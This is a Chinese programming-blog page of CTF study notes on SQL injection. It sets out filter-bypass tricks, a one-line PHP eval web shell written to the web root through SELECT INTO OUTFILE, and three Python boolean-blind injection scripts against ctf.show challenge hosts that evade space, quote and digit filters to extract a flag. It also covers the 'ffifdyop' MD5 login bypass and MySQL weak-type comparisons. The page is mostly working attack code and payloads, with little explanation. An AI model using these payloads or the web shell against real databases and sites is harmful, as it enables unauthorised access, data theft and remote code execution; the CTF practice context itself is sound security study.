Java教程
SQL注入-1
本文主要是介绍SQL注入-1,对大家解决编程问题具有一定的参考价值,需要的程序猿们随着小编来一起学习吧!
过滤某些字符
使用Replace进行替代
如过滤数字
select username, replace(replace(replace(replace(replace(replace(replace(replace(replace(replace(password, 0, '!'), 1, '@'), 2, '#'), 3, '$'), 4, '%'), 5, '^'), 6, '&'), 7, '*'), 8, '('), 9, ')') from user;
直接写shell
SELECT 1, '<?php @eval($_POST[x]);?>' INTO OUTFILE '/var/www/html/1.php'
bool盲注小脚本
无空格
import requests
import time
def get_response(result):
url = 'http://e952e288-3d6c-4c73-9f3c-9bdf904827d5.challenge.ctf.show/select-waf.php'
payload = "`ctfshow_user`where`pass`regexp'^{}'"
dic = 'ctfshow{034e69f-a87bdgijklmnpqruvxyz125_}'
data = {
'tableName': payload
}
for word in dic:
data['tableName'] = payload.format(result + word)
response = requests.post(url, data=data)
time.sleep(0.25)
if response.text.find('$user_count = 1;') > 0:
result += word
return result
if __name__ == '__main__':
result = ''
for i in range(55):
result = get_response(result)
print(result)
有空格无引号
import requests
import time
def str2hex(string):
result = ''
for word in string:
result += hex(ord(word))
return result.replace('0x', '')
def get_response(result):
url = 'http://61dea855-662d-4843-bd43-4518d01c80f6.challenge.ctf.show/select-waf.php'
payload = "ctfshow_user group by pass having pass regexp(0x{})"
dic = 'ctfshow{034e69f-a87bdgijklmnpqruvxyz125_}'
data = {
'tableName': payload
}
for word in dic:
data['tableName'] = payload.format(str2hex(result) + str2hex(word))
response = requests.post(url, data=data)
time.sleep(0.25)
if response.text.find('$user_count = 1;') > 0:
result += word
return result
if __name__ == '__main__':
result = ''
for i in range(55):
result = get_response(result)
print(result)
有空格无引号无数字
import requests
import time
true_dict = {
'0': 'false',
'1': 'true',
}
for i in range(2, 10):
true_dict[str(i)] = true_dict['1'] + '+true' * (i - 1)
def word2char(word):
num = str(ord(word))
result = 'char(concat('
for i in range(len(num)):
if i == 0:
result += '(' + true_dict[num[i]] + ')'
else:
result += ',(' + true_dict[num[i]] + ')'
result += '))'
return result
def sentence2true(string):
final_pass = ''
if string:
for i in range(len(string)):
if i == 0:
final_pass += word2char(string[i])
else:
final_pass += ',' + word2char(string[i])
final_pass += ''
return final_pass
def get_response(result):
url = 'http://283b4efa-e5be-454c-8b79-58af5d20673d.challenge.ctf.show/select-waf.php'
payload = "ctfshow_user group by pass having pass regexp(concat(char(concat((true+true+true+true+true+true+true+true+true),(true+true+true+true))),{}))"
dic = 'ctfshow{034e69f-a87bdgijklmnpqruvxyz125_}'
data = {
'tableName': payload
}
for word in dic:
data['tableName'] = payload.format(sentence2true(result + word))
response = requests.post(url, data=data)
time.sleep(0.25)
if response.text.find('$user_count = 1;') > 0:
result += word
return result
if __name__ == '__main__':
result = ''
for i in range(55):
result = get_response(result)
print(result)
ffifdyop 绕过
经过md5加密后:276f722736c95d99e921722cf9ed621c
再转换为字符串:'or'6<乱码> 即 'or'66�]��!r,��b
用法
select * from admin where password=''or'6<乱码>'
就相当于select * from admin where password=''or 1 实现sql注入
MySQL弱类型
select pass from ctfshow_user where username = 0; # 返回所有字母开头的字符串 select pass from ctfshow_user where username = 1; # 返回所有有且仅以1开头的字符串
这篇关于SQL注入-1的文章就介绍到这儿,希望我们推荐的文章对大家有所帮助,也希望大家多多支持为之网!
您可能喜欢
-
小米11i印度快充版ROM合集:极致体验,超越期待10-06
-
【ROM下载】小米11i 5G 印度版系统, 疾速跃迁,定义新速度10-06
-
【ROM下载】小米 11 青春活力版,青春无极限,活力全开10-06
-
小米13T Pro系统合集:性能与摄影的极致融合,值得你升级的系统ROM10-05
-
基于Python+Vue开发的医院门诊预约挂号系统10-01
-
基于Python+Vue开发的旅游景区管理系统10-01
-
RestfulAPI入门指南:打造简单易懂的API接口10-01
-
初学者指南:了解和使用Server Action10-01
-
Server Component入门指南:搭建与配置详解10-01
-
React 中使用 useRequest 实现数据请求10-01
-
使用 golang 将ETH账户的资产平均分散到其他账户10-01
-
JWT用户校验课程:从入门到实践10-01
-
Server Component课程入门指南10-01
-
Dnd-Kit学习:新手快速入门指南09-30
-
ESLint学习:初学者指南09-30
栏目导航
